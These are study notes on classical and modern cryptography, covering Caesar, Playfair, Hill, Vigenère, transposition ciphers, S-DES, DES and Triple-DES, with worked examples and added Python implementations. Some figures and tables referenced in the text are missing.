Caesar Cipher or Shift Cipher:

The Caesar cipher is the simplest and oldest method of cryptography. The Caesar cipher
method is based on a mono-alphabetic cipher and is also called a shift cipher or additive
cipher. Julius Caesar used the shift cipher (additive cipher) technique to communicate with his
officers. For this reason, the shift cipher technique is called the Caesar cipher. The Caesar
cipher is a kind of replacement (substitution) cipher, where each letter of the plain text is replaced by
another letter.

Let's take an example to understand the Caesar cipher. Suppose we are shifting by 1; then
A will be replaced by B, B will be replaced by C, C will be replaced by D, D will be replaced by
E, and this process continues until the entire plain text is finished.

The Caesar cipher is a weak method of cryptography. It can be easily broken, which means a
message encrypted by this method can be easily decrypted.

Plaintext: It is a simple message written by the user.

Ciphertext: It is an encrypted message after applying some technique.
The formula of encryption is:
En (x) = (x + n) mod 26
The formula of decryption is:
Dn (x) = (x - n) mod 26

If the value of Dn becomes negative (-ve), 26 is added to the negative value. Where,
E denotes the encryption
D denotes the decryption
x denotes the letter’s value
n denotes the key value (shift value)
Example 2: Use the Caesar cipher to encrypt and decrypt the message "HELLO", where the
key (shift) value of this message is 15.

Encryption

We apply encryption formulas by character, based on alphabetical order.

The formula of encryption is:

En (x) = (x + n) mod 26

Plaintext: H → 07 En: (07 + 15) mod 26 Ciphertext: 22 → W

Plaintext: E → 04 En: (04 + 15) mod 26 Ciphertext: 19 → T

Plaintext: L → 11 En: (11 + 15) mod 26 Ciphertext: 00 → A

Plaintext: L → 11 En: (11 + 15) mod 26 Ciphertext: 00 → A

Plaintext: O → 14 En: (14 + 15) mod 26 Ciphertext: 03 → D

Note that the Caesar cipher is monoalphabetic, so the same plaintext letters are encrypted as
the same letters. Like, "HELLO" has "L", encrypted by "A".

The encrypted message of this plain text is "WTAAD".

Decryption

We apply decryption formulas by character, based on alphabetical order.

The formula of decryption is:

Dn (x) = (x - n) mod 26

Ciphertext: W → 22 Dn: (22 - 15) mod 26 Plaintext: 07 → H

Ciphertext: T → 19 Dn: (19 - 15) mod 26 Plaintext: 04 → E

Ciphertext: A → 00 Dn: (00 - 15) mod 26 Plaintext: 11 → L

Ciphertext: A → 00 Dn: (00 - 15) mod 26 Plaintext: 11 → L

Ciphertext: D → 03 Dn: (03 - 15) mod 26 Plaintext: 14 → O

The decrypted message is "HELLO".

Note: If the value of Dn becomes negative (-ve), 26 is added to the negative value, as with
the third letter of the ciphertext:
Dn = (00 - 15) mod 26 = -15
The value of Dn is negative, so 26 is added to it:
-15 + 26 = 11
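The shift cipher above in Python, as an added example that is not part of the original notes. It applies the En/Dn formulas letter by letter (Python's % operator already yields a value in 0..25 for negative inputs, which is the "add 26" rule), and lists all 25 candidate decryptions to show why a 25-key cipher offers no real protection.

```python
# Added example (not from the original notes): Caesar/shift cipher with the
# page's encryption and decryption formulas, plus an exhaustive trial of all
# 25 shifts to show why the cipher is weak.
import string

ALPHABET = string.ascii_uppercase  # A=0, B=1, ..., Z=25


def caesar_encrypt(plaintext: str, shift: int) -> str:
    """E_n(x) = (x + n) mod 26, applied letter by letter.

    Non-letters are passed through unchanged; lowercase input is uppercased.
    """
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            x = ALPHABET.index(ch)
            out.append(ALPHABET[(x + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(ciphertext: str, shift: int) -> str:
    """D_n(x) = (x - n) mod 26.

    Python's % returns a value in 0..25 even for a negative operand, which is
    exactly the "add 26 if negative" rule in the notes: (0 - 15) % 26 == 11.
    """
    return caesar_encrypt(ciphertext, -shift)


def caesar_all_shifts(ciphertext: str) -> dict:
    """Try every possible key (1..25).

    With only 25 keys, nothing about the message needs to be known: every
    candidate can be listed and the readable one picked out by eye.
    """
    return {n: caesar_decrypt(ciphertext, n) for n in range(1, 26)}


if __name__ == "__main__":
    ct = caesar_encrypt("HELLO", 15)
    print(ct)                       # WTAAD
    print(caesar_decrypt(ct, 15))   # HELLO
    for n, candidate in caesar_all_shifts(ct).items():
        print(f"shift {n:2d}: {candidate}")
```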

Monoalphabetic Ciphers:
A monoalphabetic cipher is any cipher in which the letters of the plain text are mapped to
cipher text letters based on a single alphabetic key. Examples of monoalphabetic ciphers
would include the Caesar-shift cipher, where each letter is shifted based on a numeric key,
and the atbash cipher, where each letter is mapped to the letter symmetric to it about the
center of the alphabet.
There are various techniques of Monoalphabetic cipher which are as follows – (**Refer Notes)
• Additive Cipher
• Multiplicative Cipher
• Affine Cipher

Playfair Cipher:
The Playfair cipher was the first practical digraph substitution cipher. Unlike the
ciphers above, which substitute one letter at a time, Playfair encrypts pairs of letters
(digraphs).
It was used for tactical purposes by British forces in the Second Boer War and in World War
I and for the same purpose by the Australians during World War II. This was because
Playfair is reasonably fast to use and requires no special equipment.
The Playfair Cipher Encryption Algorithm:
The Algorithm consists of 2 steps:

1. Generate the key square (5×5):

• The key square is a 5×5 grid of letters that acts as the key for encrypting the plaintext.
Each of the 25 letters must be unique, and one letter of the alphabet (usually J) is omitted
from the table (as the table can hold only 25 letters). If the plaintext contains J, it is
replaced by I.

• The initial letters in the key square are the unique letters of the key, in the order in
which they appear, followed by the remaining letters of the alphabet in order.

2. Algorithm to encrypt the plain text: The plaintext is split into pairs of two
letters (digraphs). If there is an odd number of letters, a Z is appended to the last
letter.
For example:
PlainText: "instruments" After Split: 'in' 'st' 'ru' 'me' 'nt' 'sz'

***For Ex (Refer Notebook)
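Playfair in Python, as an added example that is not from the notes or the notebook. Key-square construction, the J to I merge and the Z padding follow the notes; the same-row, same-column and rectangle substitution rules, and the X inserted between a doubled pair, are the standard Playfair conventions the notes leave to the notebook. The key MONARCHY is an assumed sample key.

```python
# Added example (not from the original notes): Playfair digraph substitution.
# Key-square construction and the Z padding follow the notes; the standard
# same-row / same-column / rectangle rules and the X inserted between a
# doubled pair (e.g. "LL") are the usual Playfair conventions, which the
# notes defer to the notebook.
import string


def build_key_square(key: str) -> list:
    """5x5 square: unique key letters in order, then the rest of A..Z (J merged into I)."""
    seen = []
    for ch in (key + string.ascii_uppercase).upper():
        if ch == "J":
            ch = "I"
        if ch.isalpha() and ch not in seen:
            seen.append(ch)
    assert len(seen) == 25
    return [seen[r * 5:(r + 1) * 5] for r in range(5)]


def make_digraphs(plaintext: str) -> list:
    """Letters only, J->I, split into pairs.

    A doubled pair is separated by X (standard convention, not stated in the
    notes); an odd trailing letter is padded with Z, as in 'instruments' -> 'sz'.
    """
    letters = [("I" if ch == "J" else ch) for ch in plaintext.upper() if ch.isalpha()]
    pairs, i = [], 0
    while i < len(letters):
        a = letters[i]
        b = letters[i + 1] if i + 1 < len(letters) else None
        if b is None:
            pairs.append(a + "Z")
            i += 1
        elif a == b:
            pairs.append(a + "X")
            i += 1
        else:
            pairs.append(a + b)
            i += 2
    return pairs


def _transform(pair: str, square: list, pos: dict, direction: int) -> str:
    """direction=+1 encrypts (right/down), -1 decrypts (left/up)."""
    (r1, c1), (r2, c2) = pos[pair[0]], pos[pair[1]]
    if r1 == r2:   # same row: move along the row (wrapping at the edge)
        return square[r1][(c1 + direction) % 5] + square[r2][(c2 + direction) % 5]
    if c1 == c2:   # same column: move along the column
        return square[(r1 + direction) % 5][c1] + square[(r2 + direction) % 5][c2]
    return square[r1][c2] + square[r2][c1]   # rectangle: swap the columns


def _square_and_positions(key: str):
    square = build_key_square(key)
    pos = {ch: (r, c) for r, row in enumerate(square) for c, ch in enumerate(row)}
    return square, pos


def playfair_encrypt(plaintext: str, key: str) -> str:
    square, pos = _square_and_positions(key)
    return "".join(_transform(p, square, pos, +1) for p in make_digraphs(plaintext))


def playfair_decrypt(ciphertext: str, key: str) -> str:
    """Returns the padded plaintext letters; the receiver strips X/Z fillers by eye."""
    square, pos = _square_and_positions(key)
    pairs = [ciphertext[i:i + 2] for i in range(0, len(ciphertext), 2)]
    return "".join(_transform(p, square, pos, -1) for p in pairs)


if __name__ == "__main__":
    for row in build_key_square("MONARCHY"):
        print(" ".join(row))
    print(make_digraphs("instruments"))
    ct = playfair_encrypt("instruments", "MONARCHY")
    print(ct, playfair_decrypt(ct, "MONARCHY"))
```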

Hill Cipher:
Hill cipher is a polygraphic substitution cipher based on linear algebra.Each letter is
represented by a number modulo 26. Often the simple scheme A = 0, B = 1, …, Z = 25 is
used, but this is not an essential feature of the cipher. To encrypt a message, each block of
n letters (considered as an n-component vector) is multiplied by an invertible n × n matrix,
against modulus 26. To decrypt the message, each block is multiplied by the inverse of the
matrix used for encryption.
The matrix used for encryption is the cipher key, and it should be chosen randomly from the
set of invertible n × n matrices (modulo 26).
(*** refer NESO Academy for Ex.)

Polyalphabetic Ciphers:

One way to improve on the simple monoalphabetic technique is to use different monoalphabetic
substitutions as one proceeds through the plaintext message. The general name for this
approach is polyalphabetic substitution cipher.

All these techniques have the following features in common:

1. A set of related monoalphabetic substitution rules is used.
2. A key determines which particular rule is chosen for a given transformation.

2 Types of Polyalphabetic Ciphers

• Auto-Key: The Autokey cipher is a polyalphabetic substitution cipher. It is closely
related to the Vigenère cipher but uses a different method of generating the key. It
was invented by Blaise de Vigenère in 1586. In general, it is more secure than the
Vigenère cipher.

(*** Refer Notes for ex )

• Vigenère cipher:
Formula of encryption is,
Ei = (Pi + Ki) mod 26
Formula of decryption is,
Di = (Ei - Ki) mod 26
If the value of Di becomes negative (-ve), 26 is added to the negative value.
Where,
E denotes the encryption.
D denotes the decryption.
P denotes the plaintext.
K denotes the key.

Example: The plaintext is "JAVATPOINT", and the key is "BEST".

Encryption: Ei = (Pi + Ki) mod 26

Plaintext             J  A  V  A  T  P  O  I  N  T
Plaintext value (P)   09 00 21 00 19 15 14 08 13 19
Key                   B  E  S  T  B  E  S  T  B  E
Key value (K)         01 04 18 19 01 04 18 19 01 04
Ciphertext value (E)  10 04 13 19 20 19 06 01 14 23
Ciphertext            K  E  N  T  U  T  G  B  O  X

Decryption: Di = (Ei - Ki) mod 26

If the value of Di becomes negative (-ve), 26 is added to the negative value, as with the
third letter of the ciphertext:

N = 13 and S = 18

Di = (Ei - Ki) mod 26
Di = (13 - 18) mod 26
Di = -5 mod 26
Di = (-5 + 26) mod 26
Di = 21

Ciphertext            K  E  N  T  U  T  G  B  O  X
Ciphertext value (E)  10 04 13 19 20 19 06 01 14 23
Key                   B  E  S  T  B  E  S  T  B  E
Key value (K)         01 04 18 19 01 04 18 19 01 04
Plaintext value (P)   09 00 21 00 19 15 14 08 13 19
Plaintext             J  A  V  A  T  P  O  I  N  T

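The Vigenère example above in Python, as an added example that is not part of the original notes. It implements Ei = (Pi + Ki) mod 26 and Di = (Ei - Ki) mod 26 with the repeating key, and reproduces the trace table; the Caesar cipher is the special case of a one-letter key.

```python
# Added example (not from the original notes): Vigenere cipher using the
# page's formulas E_i = (P_i + K_i) mod 26 and D_i = (E_i - K_i) mod 26,
# with a trace table like the one worked above.
import string

ALPHABET = string.ascii_uppercase


def _clean(text: str) -> str:
    """Keep only letters, uppercased; the notes work on bare letters."""
    return "".join(ch for ch in text.upper() if ch in ALPHABET)


def vigenere_encrypt(plaintext: str, key: str) -> str:
    p, k = _clean(plaintext), _clean(key)
    if not k:
        raise ValueError("key must contain at least one letter")
    out = []
    for i, ch in enumerate(p):
        p_i = ALPHABET.index(ch)
        k_i = ALPHABET.index(k[i % len(k)])  # key repeats: B E S T B E S T ...
        out.append(ALPHABET[(p_i + k_i) % 26])
    return "".join(out)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    c, k = _clean(ciphertext), _clean(key)
    if not k:
        raise ValueError("key must contain at least one letter")
    out = []
    for i, ch in enumerate(c):
        e_i = ALPHABET.index(ch)
        k_i = ALPHABET.index(k[i % len(k)])
        # (13 - 18) % 26 == 21 in Python, i.e. the "add 26 if negative" rule
        out.append(ALPHABET[(e_i - k_i) % 26])
    return "".join(out)


def trace_table(plaintext: str, key: str) -> str:
    """Render the same rows the notes use: letters and values for P, K and E."""
    p, k = _clean(plaintext), _clean(key)
    e = vigenere_encrypt(p, k)
    key_stream = "".join(k[i % len(k)] for i in range(len(p)))
    rows = [
        ("Plaintext", list(p)),
        ("Plaintext value (P)", [f"{ALPHABET.index(c):02d}" for c in p]),
        ("Key", list(key_stream)),
        ("Key value (K)", [f"{ALPHABET.index(c):02d}" for c in key_stream]),
        ("Ciphertext value (E)", [f"{ALPHABET.index(c):02d}" for c in e]),
        ("Ciphertext", list(e)),
    ]
    return "\n".join(f"{name:22s}" + " ".join(cells) for name, cells in rows)


if __name__ == "__main__":
    print(trace_table("JAVATPOINT", "BEST"))
    print(vigenere_decrypt("KENTUTGBOX", "BEST"))  # JAVATPOINT
```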
Q4: Transposition Techniques:
In cryptography, a transposition cipher is a method of encryption by which the positions held
by units of plaintext (which are commonly characters or groups of characters) are shifted
according to a regular system, so that the ciphertext constitutes a permutation of the
plaintext. That is, the order of the units is changed. Mathematically, a bijective function is
applied to the characters' positions to encrypt and its inverse function to decrypt.
There are 2 techniques:
1. Rail Fence Cipher
2. Route Cipher
1. Rail Fence Cipher:
The Rail Fence cipher is a form of transposition cipher that gets its name from the way in
which it is encoded. In the rail fence cipher, the plaintext is written downwards on successive
"rails" of an imaginary fence, moving back up when the bottom rail is reached. The message is
then read off row by row. For example, using a rail fence of depth 2 and the message
“meet me after the toga party”, we write the following:

m e m a t r h t g p r y
 e t e f e t e o a a t

The encrypted message is

MEMATRHTGPRYETEFETEOAAT
2. Route Cipher:
In a route cipher, the plaintext is first written out in a grid of given dimensions, then read off
in a pattern given in the key. For example, using the same plaintext that we used for rail
fence:
Ex1:

WRIORFEOE
EESVELANJ
ADCEDETCX

The key might specify "spiral inwards, clockwise, starting from the top right". That
would give a cipher text of:
EJXCTEDECDAEWRIORFEONALEVSE
Ex 2:
This sort of thing would be trivial to cryptanalyze. A more complex scheme is
to write the message in a rectangle, row by row, and read the message off column by
column, but permute the order of the columns. The order of the columns then
becomes the key to the algorithm. For example,
Ciphertext:
TTNAAPTMTSUOAODWCOIXKNLYPETZ
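Rail fence and columnar transposition in Python, as an added example that is not part of the original notes. Rail fence is written for any depth (the notes show depth 2); the columnar plaintext and the numeric key used below are assumptions, namely the textbook inputs that produce the ciphertext printed above, which the notes do not show.

```python
# Added example (not from the original notes): the two transposition schemes
# above. The columnar plaintext "attackpostponeduntiltwoamxyz" and the key
# 4 3 1 2 5 6 7 are assumed here (textbook inputs for the notes' ciphertext).


def _rail_pattern(n: int, depth: int) -> list:
    """Rail index for each of n positions: 0,1,..,depth-1,..,1,0,1,.."""
    pattern, rail, step = [], 0, 1
    for _ in range(n):
        pattern.append(rail)
        if rail == 0:
            step = 1
        elif rail == depth - 1:
            step = -1
        rail += step
    return pattern


def rail_fence_encrypt(plaintext: str, depth: int) -> str:
    """Write the letters down-and-up across `depth` rails, then read rail by rail."""
    letters = [ch for ch in plaintext.upper() if ch.isalpha()]
    if depth < 2:
        return "".join(letters)
    rails = [[] for _ in range(depth)]
    for ch, r in zip(letters, _rail_pattern(len(letters), depth)):
        rails[r].append(ch)
    return "".join("".join(r) for r in rails)


def rail_fence_decrypt(ciphertext: str, depth: int) -> str:
    """Recompute the rail of each position, cut the ciphertext into rails, refill."""
    if depth < 2:
        return ciphertext
    pattern = _rail_pattern(len(ciphertext), depth)
    rails, pos = [], 0
    for r in range(depth):
        count = pattern.count(r)
        rails.append(list(ciphertext[pos:pos + count]))
        pos += count
    return "".join(rails[r].pop(0) for r in pattern)


def columnar_encrypt(plaintext: str, key: list) -> str:
    """Write rows of len(key) letters and read the columns in key order.

    key[j] is the rank of column j: the column ranked 1 is read first, then 2, ...
    """
    letters = [ch for ch in plaintext.upper() if ch.isalpha()]
    width = len(key)
    while len(letters) % width:
        letters.append("X")   # filler; the textbook example is already padded with XYZ
    rows = [letters[i:i + width] for i in range(0, len(letters), width)]
    order = sorted(range(width), key=lambda j: key[j])
    return "".join(row[j] for j in order for row in rows)


def columnar_decrypt(ciphertext: str, key: list) -> str:
    width = len(key)
    if len(ciphertext) % width:
        raise ValueError("ciphertext length must be a multiple of the key length")
    height = len(ciphertext) // width
    order = sorted(range(width), key=lambda j: key[j])
    columns = [None] * width
    for k, j in enumerate(order):          # k-th slice of ciphertext is column j
        columns[j] = ciphertext[k * height:(k + 1) * height]
    return "".join(columns[j][r] for r in range(height) for j in range(width))


if __name__ == "__main__":
    ct = rail_fence_encrypt("meet me after the toga party", 2)
    print(ct, rail_fence_decrypt(ct, 2))
    key = [4, 3, 1, 2, 5, 6, 7]
    ct = columnar_encrypt("attackpostponeduntiltwoamxyz", key)
    print(ct, columnar_decrypt(ct, key))
```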

Q5: Permutation Methods:


Permutation Ciphers

There are two common techniques used to construct ciphers:
substitution and permutation. Substitution replaces plaintext letters or strings of letters by
letters or numbers or symbols. Permutation uses the plaintext message letters but
rearranges their order.
Affine ciphers, keyword ciphers, the Hill cipher, the Playfair cipher, and the Vigenère cipher
are all examples of substitution ciphers. Frequency analysis is a tool to identify the
substitutions. Frequency analysis of a ciphertext message that has been enciphered using a
permutation cipher reveals only plaintext frequencies. Consider the following plaintext
message.
monoalphabeticunilateralsubstitutionsystem
We will encipher it using a permutation that divides the message into 5-letter blocks,
monoa lphab eticu nilat erals ubsti tutio nsyst em
Because the number of letters in the plaintext message is not a multiple of 5, the last
block must be padded. Padding must be chosen so that the person who receives the
ciphertext message and deciphers it can distinguish the message from the padding. In this
example, the last block is padded with x’s.
monoa lphab eticu nilat erals ubsti tutio nsyst emxxx
Then we rearrange the letters of the blocks according to the following permutation:

The letter in the first position of the block (on the left) moves to position 3, the letter in
position 2 moves to position 5, the letter in position 3 moves to position 4, the letter in
position 4 moves to position 1, and the letter in position 5 moves to position 2.
After the permutation is applied to the first block, we have: oamno
When the permutation is applied to all the blocks, we obtain:
monoa lphab eticu nilat erals ubsti tutio nsyst emxxx
oamno ablhp cueit atnli lsear tiusb onttu stnys xxexm
So, the ciphertext message is
oamnoablhpcueitatnlilseartiusbonttustnysxxexm
If desired, the ciphertext can be divided into blocks for transmission. Here is a ciphertext
message enciphered using the 5-letter permutation given above.
THNROKEENRCKNUTIVYNUITESRXXYXX
The message is deciphered by applying the inverse of the permutation: The letter in the first
position of the block (on the left) moves to position 4, the letter in position 2 moves to
position 5, the letter in position 3 moves to position 1, the letter in position 4 moves to
position 3, and the letter in position 5 moves to position 2.

THNROKEENRCKNUTIVYNUITESRXXYXX
THNRO KEENR CKNUT IVYNU ITESR XXYXX
north ernke ntuck yuniv ersit yxxxx
3. MODERN ENCRYPTION TECHNIQUES

Q1: SIMPLIFIED DATA ENCRYPTION STANDARD (S-DES)


(Figure: the overall structure of the simplified DES.) The S-DES encryption algorithm takes an 8-bit
block of plaintext (example: 10111101) and a 10-bit key as input and produces an 8-bit block
of ciphertext as output. The S-DES decryption algorithm takes an 8-bit block of ciphertext and
the same 10-bit key used to produce that ciphertext as input and produces the original 8-bit
block of plaintext.

The encryption algorithm involves five functions:

• an initial permutation (IP)
• a complex function labeled fK, which involves both permutation and substitution
operations and depends on a key input
• a simple permutation function that switches (SW) the two halves of the data
• the function fK again
• a permutation function that is the inverse of the initial permutation

The function fk takes as input not only the data passing through the encryption
algorithm, but also an 8-bit key. Here a 10-bit key is used from which two 8-bit subkeys
are generated. The key is first subjected to a permutation (P10). Then a shift operation
is performed. The output of the shift operation then passes through a permutation
function that produces an 8-bit output (P8) for the first subkey (K1). The output of the
shift operation also feeds into another shift and another instance of P8 to produce the
second subkey (K2).

The encryption algorithm can be expressed as a composition of functions:

IP^-1 ∘ fK2 ∘ SW ∘ fK1 ∘ IP

which can also be written as

Ciphertext = IP^-1 (fK2 (SW (fK1 (IP (plaintext)))))

where

K1 = P8 (Shift (P10 (Key)))

K2 = P8 (Shift (Shift (P10 (Key))))

Decryption can be shown as

Plaintext = IP^-1 (fK1 (SW (fK2 (IP (ciphertext)))))

1. S-DES key generation

S-DES depends on the use of a 10-bit key shared between sender and receiver. From this
key, two 8-bit subkeys are produced for use in particular stages of the encryption and
decryption algorithm. First, permute the key in the following fashion. Let the 10-bit key be
designated as (k1, k2, k3, k4, k5, k6, k7, k8, k9, k10). Then the permutation P10 is defined
as:

P10 (k1, k2, k3, k4, k5, k6, k7, k8, k9, k10) = (k3, k5, k2, k7, k4, k10, k1, k9, k8, k6)

P10 can be concisely defined by the display:

P10: 3 5 2 7 4 10 1 9 8 6

This table is read from left to right; each position in the table gives the identity of the input bit
that produces the output bit in that position. So the first output bit is bit 3 of the input; the
second output bit is bit 5 of the input, and so on. For example, the key (1010000010) is
permuted to (10000 01100). Next, perform a circular left shift (LS-1), or rotation, separately on
the first five bits and the second five bits. In our example, the result is (00001 11000). Next we
apply P8, which picks out and permutes 8 of the 10 bits according to the following rule:

The result is subkey 1 (K1). In our example, this yields (10100100). We then go back
to the pair of 5-bit strings produced by the two LS-1 functions and perform a circular
left shift of 2 bit positions on each string. In our example, the value (00001 11000)
becomes (00100 00011). Finally, P8 is applied again to produce K2. In our example,
the result is (01000011).

2. S-DES encryption

Encryption involves the sequential application of five functions.

Initial and Final Permutations

The input to the algorithm is an 8-bit block of plaintext, which we first permute using the IP
function:

This retains all 8 bits of the plaintext but mixes them up.
Consider the plaintext to be 11110011.

Permuted output = 10111101

At the end of the algorithm, the inverse permutation is used:

The Function fK
The most complex component of S-DES is the function fK, which consists of a combination of
permutation and substitution functions. The functions can be expressed as follows. Let L and
R be the leftmost 4 bits and rightmost 4 bits of the 8-bit input to fK, and let F be a mapping
(not necessarily one to one) from 4-bit strings to 4-bit strings. Then we let

We now describe the mapping F. The input is a 4-bit number (n1 n2 n3 n4). The first operation
is an expansion/permutation operation:

e.g., R= 1101

E/P output = 11101011

It is clearer to depict the result in this fashion:

The 8-bit subkey K1 = (k11, k12, k13, k14, k15, k16, k17, k18) is added to
this value using exclusive-OR.
The first 4 bits (first row of the preceding matrix) are fed into the S-box S0 to produce
a 2-bit output, and the remaining 4 bits (second row) are fed into S1 to produce another
2-bit output.

These two boxes are defined as follows:

The S-boxes operate as follows. The first and fourth input bits are treated as a 2-bit number
that specifies a row of the S-box, and the second and third input bits specify a column of the
S-box. The entry in that row and column, in base 2, is the 2-bit output. For example, if (p0,0 p0,3)
= (00) and (p0,1 p0,2) = (10), then the output is from row 0, column 2 of S0, which is 3, or
(11) in binary. Similarly, (p1,0 p1,3) and (p1,1 p1,2) are used to index into a row and column
of S1 to produce an additional 2 bits. Next, the 4 bits produced by S0 and S1 undergo a further
permutation as follows:

The output of P4 is the output of the function F.

3. The Switch Function

The function fK only alters the leftmost 4 bits of the input. The switch function (SW)
interchanges the left and right 4 bits so that the second instance of fK operates on a different
4 bits. In this second instance, the E/P, S0, S1, and P4 functions are the same. The key input
is K2. Finally, apply the inverse permutation to get the ciphertext.
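A complete S-DES in Python, as an added example that is not part of the original notes. The P10 table and the worked values above (key 1010000010, K1 = 10100100, K2 = 01000011, IP(11110011) = 10111101, E/P(1101) = 11101011) come from the notes; the P8, IP, E/P, S0, S1 and P4 tables did not survive in the notes, so the standard S-DES tables (Schaefer/Stallings) are assumed here and are consistent with every worked value the notes print.

```python
# Added example (not from the original notes): a complete S-DES implementation.
# P10 is as stated in the notes; the other tables are the standard S-DES
# tables and are assumed here because the notes' displays are missing.

P10 = (3, 5, 2, 7, 4, 10, 1, 9, 8, 6)
P8 = (6, 3, 7, 4, 8, 5, 10, 9)
IP = (2, 6, 3, 1, 4, 8, 5, 7)
IP_INV = (4, 1, 3, 5, 7, 2, 8, 6)
EP = (4, 1, 2, 3, 2, 3, 4, 1)       # expansion/permutation: n4 n1 n2 n3 n2 n3 n4 n1
P4 = (2, 4, 3, 1)
S0 = ((1, 0, 3, 2), (3, 2, 1, 0), (0, 2, 1, 3), (3, 1, 3, 2))
S1 = ((0, 1, 2, 3), (2, 0, 1, 3), (3, 0, 1, 0), (2, 1, 0, 3))


def permute(bits: str, table) -> str:
    """Output position i takes input bit table[i] (1-based), as the notes describe."""
    return "".join(bits[i - 1] for i in table)


def left_shift(half: str, n: int) -> str:
    """Circular left shift (LS-n) of a 5-bit half."""
    return half[n:] + half[:n]


def xor(a: str, b: str) -> str:
    return "".join("1" if x != y else "0" for x, y in zip(a, b))


def subkeys(key: str) -> tuple:
    """K1 = P8(LS-1(P10(key))), K2 = P8(LS-2(LS-1(P10(key))))."""
    assert len(key) == 10 and set(key) <= {"0", "1"}
    p = permute(key, P10)
    l, r = left_shift(p[:5], 1), left_shift(p[5:], 1)
    k1 = permute(l + r, P8)
    l, r = left_shift(l, 2), left_shift(r, 2)
    k2 = permute(l + r, P8)
    return k1, k2


def sbox(box, four: str) -> str:
    row = int(four[0] + four[3], 2)   # first and fourth bits select the row
    col = int(four[1] + four[2], 2)   # second and third bits select the column
    return format(box[row][col], "02b")


def F(right: str, subkey: str) -> str:
    """The mapping F: E/P, XOR with the subkey, S0 and S1, then P4."""
    x = xor(permute(right, EP), subkey)
    return permute(sbox(S0, x[:4]) + sbox(S1, x[4:]), P4)


def fk(block: str, subkey: str) -> str:
    """fK alters only the left half: (L XOR F(R, SK)) || R."""
    left, right = block[:4], block[4:]
    return xor(left, F(right, subkey)) + right


def switch(block: str) -> str:
    return block[4:] + block[:4]


def sdes_encrypt(plaintext: str, key: str) -> str:
    """IP^-1(fK2(SW(fK1(IP(plaintext)))))"""
    k1, k2 = subkeys(key)
    return permute(fk(switch(fk(permute(plaintext, IP), k1)), k2), IP_INV)


def sdes_decrypt(ciphertext: str, key: str) -> str:
    """Same structure with the subkeys in the opposite order."""
    k1, k2 = subkeys(key)
    return permute(fk(switch(fk(permute(ciphertext, IP), k2)), k1), IP_INV)


if __name__ == "__main__":
    key, pt = "1010000010", "11110011"
    print(subkeys(key))                  # ('10100100', '01000011')
    print(permute(pt, IP))               # 10111101
    ct = sdes_encrypt(pt, key)
    print(ct, sdes_decrypt(ct, key))     # 01000001 11110011
```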
Q2: DATA ENCRYPTION STANDARD (DES)
The Data Encryption Standard (DES) is a symmetric-key block cipher published by the
National Institute of Standards and Technology (NIST).
DES is an implementation of a Feistel cipher. It uses a 16-round Feistel structure. The block
size is 64 bits. Although the key length is 64 bits, DES has an effective key length of 56 bits, since 8
of the 64 key bits are not used by the encryption algorithm (they function as check bits only).
General Structure of DES is depicted in the following illustration −

Since DES is based on the Feistel Cipher, all that is required to specify DES is −

• Round function
• Key schedule
• Any additional processing − Initial and final permutation
Initial and Final Permutation
The initial and final permutations are straight permutation boxes (P-boxes) that are inverses
of each other. They have no cryptographic significance in DES. The initial and final
permutations are shown as follows −
Round Function
The heart of this cipher is the DES function, f. The DES function applies a 48-bit key to the
rightmost 32 bits to produce a 32-bit output.

• Expansion Permutation Box − Since the right input is 32 bits and the round key is
48 bits, we first need to expand the right input to 48 bits. The permutation logic is
graphically depicted in the following illustration −

• The graphically depicted permutation logic is generally described as a table in the
DES specification, illustrated as shown −
• XOR (Whitener). − After the expansion permutation, DES does XOR operation
on the expanded right section and the round key. The round key is used only in
this operation.
• Substitution Boxes − The S-boxes carry out the real mixing (confusion). DES
uses 8 S-boxes, each with a 6-bit input and a 4-bit output. Refer to the following
illustration −

• The S-box rule is illustrated below –

• There are a total of eight S-box tables. The output of all eight S-boxes is then
combined into a 32-bit section.
• Straight Permutation − The 32-bit output of the S-boxes is then subjected to the
straight permutation with the rule shown in the following illustration:

Key Generation
The round-key generator creates sixteen 48-bit keys out of a 56-bit cipher key. The process
of key generation is depicted in the following illustration −

The logic for Parity drop, shifting, and Compression P-box is given in the DES description.
DES Analysis
DES satisfies both of the desired properties of a block cipher. These two properties make the
cipher very strong.
• Avalanche effect − A small change in the plaintext results in a very great change
in the ciphertext.
• Completeness − Each bit of the ciphertext depends on many bits of the plaintext.
During the last few years, cryptanalysts have found some weaknesses in DES when the
selected keys are weak keys. These keys should be avoided.
DES has proved to be a very well designed block cipher. There have been no significant
cryptanalytic attacks on DES other than exhaustive key search.

Q3: MULTIPLE ENCRYPTION & DES

• it was clear that a replacement for DES was needed
• theoretical attacks exist that can break it
• exhaustive key search attacks have been demonstrated
• AES is the new cipher alternative
• prior to this, the alternative was to use multiple encryption with DES implementations
• Triple-DES is the chosen form

Double-DES

• could use 2 DES encrypts on each block

C = EK2(EK1(P))

• issue of reduction to a single stage, and the “meet-in-the-middle” attack
• works whenever a cipher is used twice
• since X = EK1(P) = DK2(C)
• attack by encrypting P with all keys and storing the results
• then decrypt C with all keys and match the X value
• can show this takes O(2^56) steps

Triple-DES with Two-Keys

• hence must use 3 encryptions
• would seem to need 3 distinct keys
• but can use 2 keys with the E-D-E sequence

C = EK1(DK2(EK1(P)))

✓ note: encrypt and decrypt are equivalent in security
✓ if K1 = K2 then this works as single DES

• standardized in ANSI X9.17 & ISO 8732
• no current known practical attacks

Triple-DES with Three-Keys

• although there are no practical attacks on two-key Triple-DES, there are some indications of weakness
• can use Triple-DES with three keys to avoid even these
C = EK3(DK2(EK1(P)))

• has been adopted by some Internet applications
• e.g. PGP, S/MIME

Q4: Block Cipher

BLOCK CIPHER PRINCIPLES

Virtually all symmetric block encryption algorithms in current use are based on a structure
referred to as the Feistel block cipher. For that reason, it is important to examine the design
principles of the Feistel cipher. We begin with a comparison of stream ciphers with block ciphers.

• A stream cipher is one that encrypts a digital data stream one bit or one byte at a time, e.g.,
the Vigenère cipher. A block cipher is one in which a block of plaintext is treated as a whole and
used to produce a ciphertext block of equal length. Typically a block size of 64 or 128 bits is
used.

Block cipher principles

• most symmetric block ciphers are based on a Feistel Cipher Structure

• needed since must be able to decrypt ciphertext to recover messages efficiently

• block ciphers look like an extremely large substitution

• would need a table of 2^64 entries for a 64-bit block

• instead create from smaller building blocks

• using the idea of a product cipher, in 1949 Claude Shannon introduced the idea of
substitution-permutation (S-P) networks, the modern form of the substitution-transposition
product cipher; these form the basis of modern block ciphers

• S-P networks are based on the two primitive cryptographic operations we have seen
